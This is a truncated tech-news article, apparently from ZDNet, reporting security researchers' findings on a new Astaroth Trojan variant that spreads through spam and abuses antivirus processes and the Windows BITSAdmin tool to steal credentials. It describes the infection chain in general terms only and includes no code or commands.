A new strain of the Astaroth Trojan has been given the capability to exploit vulnerable processes in antivirus software and services. Cybereason’s Nocturnus Research team said in a blog post published on Wednesday that the variant is able to utilize modules in cybersecurity software in order to steal online credentials and personal data. More security news Forgot password? Five reasons why you need a password manager Winnie The Pooh takes over Reddit due to Chinese investment, censorship fears Should you be scared of your laptop’s webcam? iPhone snooping: Apple cracks down on apps that secretly record taps, keystrokes In its latest form, Astaroth is being used in spam campaigns across Brazil and Europe, with thousands of infections recorded at the end of 2018. The malware spreads through .7zip file attachments and malicious links. The cybersecurity researchers said the Trojan masquerades as a JPEG, .GIF, or an extensionless file to avoid detection when executed on a machine. If a spam email or phishing messages prove successful and the file is downloaded and opened, the legitimate Microsoft Windows BITSAdmin tool is used to download the full payload from a command-and-control (C2) server. After initializing, the malware launches an XSL script which establishes a channel with the C2 server. The script, which is obfuscated, contains functions to hide itself from antivirus software and is responsible for the process which leverages BITSAdmin to download payloads, including Astaroth, from a separate C2 server. See also: Google’s Adiantum gives your mobile device an encryption boost Past… [Read full story]
ZDNet is a business technology news website published by CBS Interactive, along with TechRepublic. The brand was founded on April 1, 1991, as a general interest technology portal from Ziff Davis and evolved into an enterprise IT-focused online publication owned by CNET Networks.